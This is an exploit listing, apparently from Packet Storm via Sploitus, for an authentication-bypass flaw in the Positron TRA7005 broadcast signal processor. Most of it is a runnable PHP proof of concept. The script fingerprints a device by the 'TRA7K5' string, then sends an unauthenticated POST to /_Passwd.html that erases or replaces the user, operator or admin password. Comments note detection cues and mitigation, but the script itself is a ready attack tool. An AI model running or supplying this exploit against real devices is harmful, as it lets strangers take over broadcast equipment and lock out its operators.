## https://sploitus.com/exploit?id=PACKETSTORM:181855
=============================================================================================================================================
| # Title : Positron Broadcast Signal Processor TRA7005 v1.20 5.1.6 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.1 (64 bits) |
| # Vendor : https://www.positron.it/prodotti/apparati-broadcast/stereo-multicoder/tra-7005/ |
=============================================================================================================================================
poc :
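[+] Cross-site request forgery causes authentication bypass in Positron DSP (TRA7005)
[+] Note : the request built below carries no credentials, session cookie or anti-CSRF token, so the password form at /_Passwd.html is the only place where authentication could be enforced; keeping the web interface on a trusted management network limits exposure.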
[+] save as poc.php
[+] Usage : C:\www\test>php 3.php poc.php
[+] payload :
<?php
// Proof-of-concept from the advisory above. It fetches /_Device.html, looks for
// the string 'TRA7K5', and then submits one form field to /_Passwd.html.
// Defensive reading: neither request carries a cookie, an Authorization header
// or a CSRF token (the stream context below sets only the five headers listed),
// so any effect on the device happens without a login.

// Make sure the argument count is correct (script name plus three arguments).
if ($argc != 4) {
echo "Usage: php positron.php <ip:port> <user/oper/admin> <erase/new_pwd>\n";
exit(1);
}
// Host (with optional port), account type, and either 'erase' or the new password.
$ip = $argv[1];
$ut = $argv[2];
$wa = $argv[3];
// Check the user type against the three account names the form is built for.
$valid_ut = ['user', 'oper', 'admin'];
if (!in_array(strtolower($ut), $valid_ut)) {
echo "Invalid user type! Use 'user', 'oper', or 'admin'.\n";
exit(1);
}
// Both endpoints are addressed over plain HTTP on the device's web interface.
$url = "http://$ip/_Passwd.html";
$did = "http://$ip/_Device.html";
// Check the device: the page body is searched for the marker 'TRA7K5'.
// '@' suppresses PHP warnings; failure is detected via the FALSE return instead.
$response = @file_get_contents($did);
if ($response === FALSE) {
echo "Error checking device.\n";
exit(1);
} elseif (strpos($response, 'TRA7K5') !== false) {
// NOTE(review): a marker match only identifies the model string; it does not
// show the firmware version or whether the password form is actually exposed.
echo "Vulnerable processor found!\n";
} else {
echo "Not Vulnerable or not applicable. Exploit exiting.\n";
exit(1);
}
// Set up the request headers and method for the form submission.
// For detection: the User-Agent below is a fixed string chosen by this script and
// is client-controlled, so it is a weak indicator; the stronger signal is a POST
// to /_Passwd.html that arrives with no session or credentials attached.
$options = [
'http' => [
'header' => [
'Content-Type: application/x-www-form-urlencoded',
'Accept-Language: mk-MK,en;q=0.6',
'Accept-Encoding: gzip, deflate',
'User-Agent: R-Marina/11.9',
'Accept: */*'
],
'method' => 'POST',
'content' => '',
],
];
// The form body is a single field named 'PSW_' followed by ucfirst() of the
// account type given on the command line.
$payload = [];
// If the goal is to erase the password, the literal value 'NONE' is sent.
// NOTE(review): presumably the device treats 'NONE' as "no password" — inferred
// from the usage text, not shown in this script.
if (strtolower($wa) == 'erase') {
$payload['PSW_' . ucfirst($ut)] = 'NONE';
} else {
// If the goal is to set a new password, the third argument is sent as-is.
$payload['PSW_' . ucfirst($ut)] = $wa;
}
$options['http']['content'] = http_build_query($payload);
// Execute the POST request.
$context = stream_context_create($options);
$result = file_get_contents($url, false, $context);
// Only transport failure is detected; the response body is printed unparsed, so
// the script itself does not confirm whether the device changed anything.
if ($result === FALSE) {
echo "Failed to send the request.\n";
} else {
echo "Response:\n";
echo $result;
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================